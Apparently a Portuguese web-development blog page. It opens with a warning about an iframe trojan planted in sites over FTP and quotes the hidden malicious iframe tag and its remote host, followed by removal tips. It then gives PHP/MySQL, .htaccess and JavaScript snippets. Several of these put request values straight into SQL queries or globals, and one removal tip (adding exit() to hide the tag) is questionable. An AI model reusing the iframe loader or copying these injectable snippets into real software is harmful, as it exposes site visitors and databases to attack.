Vírus Iframe, um trojan hacker que infecta seu site, blog ou página pelo FTP.

Vírus Iframe, um trojan hacker que infecta seu site, blog ou página pelo FTP. Uma linha de código dentro do html que carrega um vírus para o usuário, alguns anti-vírus conseguem detectar e apenas fecha a página, sem mostrar o conteúdo do site e ainda, sem matar o vírus.

Um novo vírus está se espalhando pela Internet, não por email como  antigamente’, mas sim pelo código-fonte dos sites da Web. Para descobrir se sua página tem esse vírus, clique em com o botão direito na página e vá em Exibir código fonte, aí dentro digite ctrl + f e busque por iframe. Se aparecer algo como este abaixo, parabéns, você é mais um contemplado nesta nova praga.

iframe src="http://untlexy.net/?click=A0A0A0" width=1 height=1 style="visibility:hidden;position:absolute">

Não vou elogiar a criatividade dos criadores de vírus, parece que só agora eles descobriram a tag Iframe. Este código traz uma Url qualquer, pode ser uma página dentro ou fora do servidor do site. Um elemento Html antes muito usado, está caindo da biblioteca dos programadores depois do Ajax. Este iframe usado de má fé, traz um código css dentro do atributo Style, que esconde o conteúdo, ou seja, não traz nenhuma modificação na parte visual do site infectado, e mesmo assim continua executando o conteudo do url, que é um script que tenta instalar um vírus na máquina do usuário.

Como remover este vírus:

• abra os arquivos index.php em seu site e remova a linha com o código.
• passe o antivírus em sua máquina
• não salve as senhas nos programas de ftp, ex.: dreamweaver
• use o código exit(); no final do arquivo php

Quando usamos o código exit(); no final do arquivo, impedimos que apareça a tag do vírus, mesmo que ele esteja dentro do código.

No WordPress ele infecta:

• index.php
• wp-admin/index.php
• wp-content/themes/seutema/index.php
• wp-content/themes/seutema/home.php

Encontrei pouca documentação interessante sobre isto, quase nada para ser sincero, acredito que ele rouba as senhas do blog, do ftp e ainda instala um trojan. Quem tem um bom antivírus não consegue vizualizar a página.

Caso tenha alguma dúvida ou sugestão comente abaixo.

Tags:blog, iframe, site, virus

PHP e MySql: Apagar Dados

 < ?php
$query = "DELETE FROM `tabela` WHERE id='$_GET[id]'";
$deleta = mysql_query($query) or print(mysql_error());
header("Location: pagina.php");
exit;
?>

Tags:MySql, mysql DELETE, PHP, php exit, php header(), php mysql_query()

PHP e MySql: Editar Dados

< ?php
$sql = "UPDATE `tabela` SET `coluna`='$dado' WHERE `id`='$id'";
$atualiza = mysql_query( $sql ) or print( mysql_error() );
header("Location: pagina.php");
exit;
?>

Tags:função exit, função header, função mysql_query, PHP

PHP e Mysql: Adicionar ao Banco de Dados

< ?php include("../src/conectar.php"); ?>
< ?
$data =  date("Y-m-d H:i:s"); 
$titulo = htmlentities($_POST['titulo']);
$texto = htmlentities($_POST['texto']);
$tabela = "conteudo";
$campos = "datahora, titulo, texto";
$dados = "'$data', '$titulo', '$texto'";
$query = "INSERT INTO ".$tabela." (".$campos.") VALUES (".$dados.")";
$sql = mysql_query($query) or print(mysql_error());

header("Location: pagina.php"); /* Redirect browser */

/* Make sure that code below does not get executed when we redirect. */
exit;
?>

Tags:MySql, mysql INSERT, mysql INTO, mysql VALUES, PHP, php date(), php header(), php htmlentities(), php include(), php mysql_error(), php mysql_query(), php print()

URL 2.0

.htaccess

1. DirectoryIndex ./index.php
2. IndexIgnore */*
3. RewriteEngine On
4. RewriteBase /
5. RewriteRule ^([0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?$ http://www.exemplo.com.br/index.php?option=$1&1=$2&2=$3&3=$4&4=$5&5=$6&6=$7&7=$8&8=$9
6. AddType image/gif .jpg

index.php

<?php
$i = 1;
while ($i < 9){
 $var_str = explode("/",$_GET[$i]);
  if ($var_str[0] <> ""){
   $GLOBALS[$var_str[0]] = $var_str[1];
  }
 $i++;
}
unset($i,$var_str);
$option = $_GET["option"];
?>

Validar formulário em Javascript

<script language="javascript" type="text/javascript">
function valida(formulario){
var total = formulario.elements.length;
i = 0
while (i <= total)
{
if(formulario.elements[i].value == ""){
//    alert("O campo " + formulario.elements[i].name + "  continua vazio.");
formulario.elements[i].focus();
return false;
break;
}
i++
}
}
</script>
<form onSubmit="return valida(this);">

Listar somente arquivo mp3

<?php
$path = "../tmp/";
$d = dir($path);
echo "<ul>\n";
while (false !== ($entry = $d->read())) {
if((substr($entry, -3) == "MP3") || (substr($entry, -3) == "mp3")) {
$url = htmlentities($entry);
$file = rawurlencode($entry);
echo "<li>";
echo "<a href=\"$path$file\">";
echo $url;
echo "</a>";
echo "</li>\n";
}
}
echo "</ul>\n";
$d->close();
?>

Função para listar diretórios.

• Na linha 6 está restrito apenas para arquivos no formato MP3, pode ser mudado para jpg, gif ou qualquer extensão. Não lê o mime-type, apenas usa a função substr, que retira as últimas três letras para identificar com a extensão do arquivo.
• Na linha 7 a função htmlentities trabalha com os caracteres especiais.
• Na linha 8 a função rawurlencode converte os acentos e caracteres especiais para usarmos na url do arquivo.

Tags:função dir, função htmlentities, função rawurlencode, função read, função substr, PHP

Retirar acentos e caracteres especiais

<?php
$t = "Acentuação em arquivos.doc";
$p = strtr($t, "áàãâéêíóôõúüçÁÀÃÂÉÊÍÓÔÕÚÜÇ ", "aaaaeeiooouucAAAAEEIOOOUUC_");
$url = ereg_replace('[^a-zA-Z0-9_.]', '', $p);
$url = strtolower($url);
echo $url; // acentuacao_em_arquivos.doc
?>

Script retira acentos e caracteres especiais, depois converte para minúsculas. Útil para arquivos e url.

Tags:função ereg_replace, função strtolower, função strtr, PHP

PHP: Retornar uma parte de uma string com as palavras inteiras

< ?
$frase = "China defende novas regras para áudio e vídeo na internet";
$divide = explode(" ", $frase);
$total = count( $divide );
$soma = 0;
$palavras = 4;
for ($i = 0; $i < $total; $i++) {
$f = $divide[$i];
$len = strlen($f);
$soma = $soma + intval($len);
$soma ++;
if($i >= $palavras)break;
}
echo substr($frase, 0, $soma);
?>

Retorna:

China defende novas regras

Tags:PHP, php break, php count, php explode, php for, php if(), php intval(), php strlen(), php substr